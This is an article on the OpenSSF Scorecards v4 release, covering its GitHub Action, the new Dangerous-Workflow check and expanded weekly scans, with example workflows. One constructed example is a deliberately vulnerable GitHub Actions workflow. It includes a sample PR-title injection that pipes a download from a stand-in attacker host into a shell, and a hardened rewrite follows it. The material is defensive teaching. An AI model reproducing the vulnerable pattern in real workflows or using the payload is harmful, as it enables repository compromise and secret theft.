The Open Source Security Foundation (OpenSSF) has released version 4 of Scorecards, an initiative originally launched by GitHub and Google. Scorecards is an automated security tool for open source projects that flags risky supply-chain practices. This release includes a new Scorecards GitHub Action, improved security checks, and a large increase in the number of repositories the foundation scans each week.
Scorecards is a set of automated checks that analyse and assess a project's security practices. Among other things, the checks verify that the repository contains no checked-in binaries, that branch protection is enabled, that code review is required, and that releases are cryptographically signed. The project repository holds the complete list of available checks. When the tool runs, it produces a score from 0 to 10 for each individual security practice, as well as an aggregate score for the project.
The new Scorecards GitHub Action makes the tool easier to use. Once the Action is installed, the Scorecards workflow is preconfigured to run automatically on every change to the repository. The results are uploaded to GitHub's code scanning alerts API and appear in the Security tab of the repository's code scanning dashboard. This improves on previous versions, which required running the tool manually.
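A minimal workflow that wires the Action into a repository and feeds its output to code scanning, as an added example rather than the project's own documentation. The inputs results_file, results_format, repo_token and publish_results are the Action's documented inputs on the v1 line; the version tags, the cron schedule and the SCORECARD_READ_TOKEN secret name are assumptions, and in practice the action references should be pinned to full commit SHAs (Scorecards' own Pinned-Dependencies check scores this).

```yaml
# Added example: .github/workflows/scorecards.yml
# Runs the Scorecards Action and uploads its SARIF output to GitHub code scanning.
# Version tags (@v1, @v2), the cron schedule and the secret name are assumptions;
# pin the action references to full commit SHAs in production.
name: Scorecards supply-chain security

on:
  push:
    branches: [ main ]        # re-score the default branch on every change
  schedule:
    - cron: '30 1 * * 6'      # plus a weekly run so scores do not go stale

# Default every job to read-only; grant write only where the job needs it.
permissions: read-all

jobs:
  analysis:
    name: Scorecards analysis
    runs-on: ubuntu-latest
    permissions:
      security-events: write  # required to upload SARIF to code scanning
      actions: read
      contents: read

    steps:
      - name: Checkout code
        uses: actions/checkout@v2
        with:
          persist-credentials: false   # do not leave the token in .git/config

      - name: Run Scorecards analysis
        uses: ossf/scorecard-action@v1
        with:
          results_file: results.sarif
          results_format: sarif
          # Read-only personal access token stored as a repository secret;
          # the v1 action uses it for checks that need the authenticated API.
          repo_token: ${{ secrets.SCORECARD_READ_TOKEN }}
          # Publishing feeds the public results API; ignored for private repos.
          publish_results: true

      # Upload the SARIF file to the code scanning alerts API; findings then
      # appear under the repository's Security tab.
      - name: Upload to code scanning
        uses: github/codeql-action/upload-sarif@v1
        with:
          sarif_file: results.sarif
```

Each check that loses points surfaces as its own code scanning alert, so a regression (a branch protection rule removed, a dependency unpinned) is visible in the same place as any other scanning finding rather than only in the aggregate score.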
This version adds a new check for dangerous code patterns in GitHub Actions workflows, the first check to carry a Critical risk level. It detects improper use of the pull_request_target trigger and the potential for script injection in GitHub workflows. A workflow triggered by pull_request_target runs in the context of the base repository, with its secrets and a write-capable token, even for pull requests from forks; when that trigger is combined with an explicit checkout of the untrusted pull request's code, a malicious pull request can compromise the repository.
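The two patterns the check flags, shown as a constructed example that is not from the Scorecards project or the article: a workflow that checks out an untrusted PR under pull_request_target and interpolates the PR title into a shell step, followed by a hardened rewrite. The job names, commands and the NPM_TOKEN secret are illustrative; the two workflows are separated by a YAML document marker here but would live in separate files.

```yaml
# Added example (constructed): the patterns the Dangerous-Workflow check flags,
# followed by a hardened rewrite. Job names, commands and secret names are
# illustrative.
#
# --- Vulnerable ---
# pull_request_target runs in the context of the BASE repository: it receives
# the repository's secrets and a GITHUB_TOKEN with write access, even when the
# PR comes from a fork. Checking out the PR head and executing its build script
# hands that context to whoever opened the PR.
name: CI (vulnerable)
on:
  pull_request_target:

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
        with:
          # Explicit checkout of untrusted PR code (flagged).
          ref: ${{ github.event.pull_request.head.sha }}
      # The PR controls package.json and its "test" script (and any postinstall
      # hook), so this runs attacker-chosen code with NPM_TOKEN in the environment.
      - run: npm install && npm test
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
      # Script injection (flagged): the expression is substituted into the shell
      # script BEFORE it runs, so a PR titled
      #   x"; curl https://attacker.example/x | sh; echo "
      # executes the attacker's command on the runner.
      - run: echo "Testing PR: ${{ github.event.pull_request.title }}"
---
# --- Hardened ---
# Use the plain pull_request trigger for anything that executes PR code: for
# fork PRs it runs with a read-only token and without repository secrets. Pass
# untrusted event fields through the environment instead of interpolating them,
# and quote the variable so the shell treats it as data, not code.
name: CI (hardened)
on:
  pull_request:

permissions:
  contents: read

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2    # default merge ref; no explicit PR head needed
      - run: npm install && npm test # no secrets are exposed to fork PRs
      - run: echo "Testing PR: $PR_TITLE"
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
```

When a job genuinely needs write access to react to a pull request (labelling, commenting), keep pull_request_target for that job but never check out or execute the PR's code in it; a common split is a pull_request job that builds and uploads an artifact, and a separate workflow_run job that consumes the artifact with the elevated token.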
The Scorecards team also runs weekly scans of the most important open source projects, selected by the number of projects that depend directly on them. This release increases the number of projects scanned from 50,000 to one million. The weekly scans now use the same 0-10 rating scale as the self-service tool. The results are available through the OpenSSF Security Metrics dashboard, the Scorecards API, a BigQuery public dataset, and the Open Source Insights website.
OpenSSF Scorecards is available on GitHub. Public repositories can use the GitHub Action workflow together with the code scanning API, and 1,000 Actions minutes per month are free for all public projects on GitHub.